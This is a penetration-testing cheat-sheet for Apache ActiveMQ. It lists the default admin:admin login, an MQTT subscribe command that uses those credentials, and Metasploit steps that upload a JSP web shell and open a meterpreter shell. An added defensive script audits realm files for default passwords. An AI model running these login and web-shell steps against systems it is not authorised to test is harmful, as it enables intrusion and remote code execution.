# Apache ActiveMQ Pentesting

Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.

### Default Credentials

```shellscript
admin:admin
```
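
To audit a broker for the default pair above, the following added example (not from the original page or the ActiveMQ project) scans a Jetty-style realm properties file for plaintext passwords that equal the username or a common default. The `user: password[, role ...]` layout, the `OBF:`/`MD5:`/`CRYPT:` prefixes, the function names and the sample entries are assumptions and constructed data.

```shell
#!/bin/sh
# Added example: flag default or guessable accounts in a realm file whose
# lines look like "user: password[, role ...]" (assumed format).

# audit_realm FILE -> prints "DEFAULT <user>" for plaintext passwords that
# match the username or a common default, and "UNCHECKED <user>" for
# obfuscated/hashed entries that cannot be compared offline.
audit_realm() {
    awk '
        /^[ \t]*(#|$)/ { next }                 # skip comments and blank lines
        {
            i = index($0, ":")
            if (i == 0) next                    # not a "user: password" line
            user = substr($0, 1, i - 1)
            pass = substr($0, i + 1)
            sub(/,.*/, "", pass)                # drop the role list
            gsub(/^[ \t]+|[ \t]+$/, "", user)   # trim both fields
            gsub(/^[ \t]+|[ \t]+$/, "", pass)
            if (pass ~ /^(OBF|MD5|CRYPT):/) {   # stored form is not plaintext
                print "UNCHECKED " user
                next
            }
            if (pass == user || pass == "admin" || pass == "password")
                print "DEFAULT " user
        }
    ' "$1"
}

# Constructed sample: one default pair, one obfuscated entry, one strong password.
sample_realm() {
    cat <<'EOF'
# username: password [,rolename ...]
admin: admin, admin
monitor: OBF:1v2j1uum1xtv1zej, user
ops: kR7-long-random-value, admin
EOF
}

# Demo run against the constructed sample.
tmp=$(mktemp)
sample_realm > "$tmp"
audit_realm "$tmp"
rm -f "$tmp"
```

Any `DEFAULT` line means the account should get a new, unique password before the console or broker listeners are reachable from untrusted networks.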

### Interaction with MQTT

If an MQTT server is running on the target system, we can subscribe or publish to a topic in ActiveMQ using an MQTT client.

#### Subscribe to a Topic

```shellscript
# -h: Host
# -u: Username
# -P: Password
# -t: Topic name
# -V: MQTT protocol version (5, 31, 311)
mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31
```

### Web Shell by File Upload JSP

ActiveMQ is vulnerable to web shell deployment via upload of an arbitrary JSP file.

```shellscript
msfconsole
msf> use exploit/multi/http/apache_activemq_upload_jsp
msf> set ...
msf> run
meterpreter> shell
```
